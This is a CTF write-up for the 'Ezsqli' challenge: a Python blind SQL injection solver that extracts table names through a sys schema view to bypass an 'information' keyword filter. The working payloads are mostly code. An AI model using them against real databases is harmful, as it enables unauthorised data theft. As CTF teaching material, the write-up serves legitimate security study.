Ezsqli
题目过滤了 information 关键字,无法使用 information_schema,因此表名改用 sys.schema_table_statistics_with_buffer 视图,通过布尔盲注逐字符读出。
import requests
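# Boolean-based blind SQL injection solver for the "Ezsqli" challenge.
#
# The `id` parameter is sent as if(<condition>,1,2). The script treats a
# response containing the marker 'Nu1L' as "condition true", which gives a
# one-bit oracle. Each character of the target string is then recovered with
# a binary search over the printable ASCII range.
#
# The challenge filters the keyword `information`, so table names are read
# from sys.schema_table_statistics_with_buffer instead. A keyword blacklist
# therefore does not stop metadata enumeration; the server-side fix is a
# parameterised query for `id`.
if __name__ == "__main__":
    url = "http://53707f57-a533-4f9f-9627-6535095886c9.node4.buuoj.cn:81/index.php"
    i = 0  # 1-based character position inside the string being extracted
    result = ""
    while True:
        i = i + 1
        # Search window: 32 (space) up to 127, i.e. printable ASCII.
        head = 32
        tail = 127
        while head < tail:
            mid = (head + tail) >> 1
            # Step 1 (kept for reference): current database name.
            # payload = {'id': f'if(ascii(substr(database(),{i},1))>{mid},1,2)'}
            # Step 2: table names of the current database. As published, both
            # payload lines were commented out, so `payload` was undefined and
            # the request below raised NameError.
            payload = {'id': f'if(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{i},1))>{mid},1,2)'}
            # A timeout keeps a stalled connection from blocking the loop forever.
            res = requests.post(url=url, data=payload, timeout=10)
            if 'Nu1L' in res.text:
                # Condition true: the character code is greater than mid.
                head = mid + 1
            else:
                # Condition false: the character code is at most mid.
                tail = mid
        if head != 32:
            result += chr(head)
        else:
            # head stays at 32 only when every comparison was false, which is
            # what happens once position i is past the end of the string.
            # NOTE: a literal space (code 32) in the data also ends the loop.
            break
        print(result)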